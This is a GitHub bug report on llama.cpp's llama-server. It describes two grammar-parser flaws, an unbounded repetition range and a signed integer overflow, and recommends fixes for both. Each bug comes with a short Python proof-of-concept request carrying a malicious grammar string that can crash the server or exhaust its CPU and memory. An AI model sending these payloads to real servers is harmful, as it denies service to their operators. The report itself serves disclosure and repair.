-
Notifications
You must be signed in to change notification settings - Fork 15.4k
Description
Name and Version
./llama-cli --version
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (AMD EPYC 9654 96-Core Processor)
load_backend: failed to find ggml_backend_init in /data/ylwang/Projects/llama.cpp/build/bin/libggml-cpu.so
version: 7090 (0de8878)
built with cc (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0 for x86_64-linux-gnu
Operating systems
Linux
Which llama.cpp modules do you know to be affected?
llama-server
Command line
llama-server -m 0.gguf --host 0.0.0.0Problem description & steps to reproduce
Bug 1: Unbounded Repetition Range Causes DoS
PoC
import requests
resp = requests.post(
"http://localhost:8080/v1/chat/completions",
json={
"messages": [
{"role": "user", "content": "\n" * 1}
],
"max_tokens": 20,
"grammar": "root ::= \"a\"{2000000000,2147483647}"
}
)
print(resp.text)
Impact
This grammar triggers a repetition range of {2000000000, 2147483647}.
The grammar parser expands repetitions by iterating from the minimum to maximum count, resulting in over two billion iterations.
This leads to:
- 100% CPU utilization,
- unbounded memory growth due to repeated vector expansion,
- and a full Denial-of-Service (DoS) of the LLM server.
In realistic usage, repetition counts should never approach these magnitudes. Allowing users to specify arbitrary repetition bounds is unsafe and unnecessary.
Fix Recommendation
In ./llama.cpp/src/llama-grammar.cpp (line ~481):
int min_times = std::stoul(std::string(pos, int_end - pos));
A validation step should be added after parsing numeric values. For example, enforce a reasonable upper bound such as:
min_times <= 100000max_times <= 100000
This prevents pathological repetition ranges from causing DoS.
Bug 2: Signed Integer Overflow Due to Incorrect Type Usage
PoC
import requests
resp = requests.post(
"http://localhost:8080/v1/chat/completions",
json={
"messages": [
{"role": "user", "content": "\n" * 1}
],
"max_tokens": 20,
"grammar": "root ::= \"a\"{2147483648,2}"
}
)
print(resp.text)
Server Output
/data/ylwang/Projects/llama.cpp/src/llama-grammar.cpp:382:36: runtime error: signed integer overflow: 2 - -2147483648 cannot be represented in type 'int'
Root Cause
At line ~481 in llama-grammar.cpp, the parser stores the result of std::stoul()—which returns an unsigned long—into an int:
int min_times = std::stoul(std::string(pos, int_end - pos));
When the user supplies:
{2147483648, 2}
std::stoul() correctly returns 2147483648, but storing this into a 32-bit signed int causes wrap-around to:
min_times = -2147483648
Later, at line ~382:
auto n_opt = max_times < 0 ? 1 : max_times - min_times;
the expression 2 - (-2147483648) causes a signed integer overflow, triggering UBSan warnings and entering undefined behavior.
Fix Recommendation
Same as Bug 1: numerical fields must be range-checked.
Alternatively, store min_times/max_times in a type that can safely hold the parsed values (e.g., uint64_t) and verify that they fit within an acceptable application-level bound.
First Bad Commit
No response